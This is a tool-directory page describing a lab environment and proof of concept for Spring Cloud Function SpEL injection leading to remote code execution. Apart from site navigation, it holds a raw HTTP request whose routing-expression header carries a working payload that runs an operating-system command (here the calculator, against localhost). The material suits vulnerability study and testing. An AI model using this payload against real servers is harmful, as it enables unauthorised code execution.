Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/pizz33/spring-cloud-function-spel
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubpizz33/spring-cloud-function-spel

Spring-Cloud-Function-SpEL

Reproduction environment and proof-of-concept for Spring Cloud Function SpEL injection leading to remote code execution, with a runnable Java 11 demo and HTTP request example.

View Repository
2484 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Spring-Cloud-Function-SpEL

Visit my personal blog for details https://pizz33.github.io/
A test environment for Spring Cloud Function SpEL expression injection
Version: Java 11. Start with java -jar demo-0.0.1-SNAPSHOT.jar

Once set up, access port 127.0.0.1:8080
image

root@kitploit:~
POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

xxx

ed8de6718b7501e80a470a96293aa37

Download Tool